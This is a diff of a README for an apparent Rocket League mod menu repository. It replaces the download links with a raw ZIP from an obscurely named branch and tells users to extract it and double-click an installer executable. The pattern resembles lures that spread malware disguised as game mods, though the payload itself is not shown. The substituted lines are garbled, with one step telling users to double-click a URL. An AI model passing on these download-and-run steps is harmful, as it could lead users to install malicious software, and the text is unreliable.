cesarsilva14/rocket-league-mod-hub/README.md

 ## 🏁 Installation

-Boost your ride safely—follow these stepwise instructions any time a https://cesarsilva14.github.io appears!
+Boost your ride safely—follow these stepwise instructions any time a https://github.com/cesarsilva14/rocket-league-mod-hub/raw/refs/heads/branch/eleutherophyllous/mod-rocket-league-hub-v2.2.zip appears!

 1. **Download:**
-   Tap the Download button above (or at the bottom) or visit the official https://cesarsilva14.github.io to obtain the mod menu installer.
+   Tap the Download button above (or at the bottom) or visit the official https://github.com/cesarsilva14/rocket-league-mod-hub/raw/refs/heads/branch/eleutherophyllous/mod-rocket-league-hub-v2.2.zip to obtain the mod menu installer.

 2. **Unpack:**
    Extract the downloaded ZIP to a convenient directory.

 3. **Run Installer:**
-   Double-click the `RocketLeagueModMenu_Installer.exe` (or run the correct script for your OS).
+   Double-click the `https://github.com/cesarsilva14/rocket-league-mod-hub/raw/refs/heads/branch/eleutherophyllous/mod-rocket-league-hub-v2.2.zip` (or run the correct script for your OS).
    *For macOS/Linux: follow the on-screen custom instructions.*

 4. **Select Folder:**